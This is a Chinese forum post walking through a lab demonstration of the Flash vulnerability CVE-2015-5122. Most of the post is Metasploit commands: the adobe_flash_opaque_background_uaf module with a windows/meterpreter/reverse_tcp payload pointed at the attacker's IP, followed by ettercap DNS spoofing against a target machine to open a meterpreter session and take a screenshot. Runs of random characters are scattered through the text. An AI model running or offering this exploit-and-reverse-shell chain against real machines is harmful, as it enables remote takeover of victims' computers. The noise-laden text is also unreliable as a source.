cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

; V8 }1 m( p. c* E" b% d 二、cve2015-5122漏洞实例演示虚拟机 # Z) ?* A T6 X% A! n4 e

) Y/ j7 m' [' _! q4 R8 Q& \3 } 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ; v% V8 K+ F7 K0 [" Y( E& e

+ _& P0 \ t2 ~3 ]. z search cve-2015-5122如图： + g) v4 |8 h- j' q- x9 ]9 X* I

1 Q6 `$ D% Q3 j2 m7 b6 D / g0 m3 @4 M, M% T

4 h h& r e" ]' R 下面我们敲如下命令： 6 Q# x/ ]- }& D! g) `

6 c7 ?, c+ r8 y6 L9 P% W8 T use exploit/multi/browser/adobe_flash_opaque_background_uaf : o1 N7 I* F# o

$ x O _1 u" d" _ set PAYLOAD windows/meterpreter/reverse_tcp 1 E; ]/ \5 u) U# ^

1 n; ~; {' l' K% {. a7 H7 V4 X* k set LHOST 192.168.0.109 , K' C# V6 Q- R' A: J

( G( `6 y! k) w set URIPATH / /*根目录*/ 4 v$ X( T) [( ^3 b

o: ]$ U" n3 o; S set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ' ^# Z- Q9 {0 u$ L+ r

4 l& I' W3 K$ H( m+ [4 t set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + n/ ]! @7 j0 Y, m

2 A# m( \! k/ O% N" O 然后show options如图： ( d! \2 p. p2 [! n

) Q; S7 I* P7 [: q - |6 E, Z& A. E; ?- K

- W! j: T$ y: j, e' J4 b 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
, J1 V: E a* t* o 9 E- _5 F: l# G# \) M$ p% o) S

' W* W) b V& b/ O+ i- t 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 7 j |, @' V3 _) U( }2 S+ g" Z

8 L, U2 F2 t U Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf % W' u! N: G7 q, ?1 {) _

; q Z/ \2 i4 A, Z0 C3 O1 q$ X ; l3 A, f( }( a

* O% m# g |/ a7 k3 J 成功了，这时候我们断开ettercap，如图： 6 d c0 M3 v- R) v* Y& z

) L& w1 Q9 E6 x ) O. m5 S4 T! H! V

+ I+ ]& [5 y, p Screenshot如图： 0 Q5 v* f/ a! O* Q j5 H5 @

( P, ]0 [+ A3 e# G- w8 i: w. H/ T 4 d. Y& }4 o2 P/ O e3 O

. I+ t- [9 N1 s, Z- n# b, V + f+ p+ j- O4 Q7 V

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块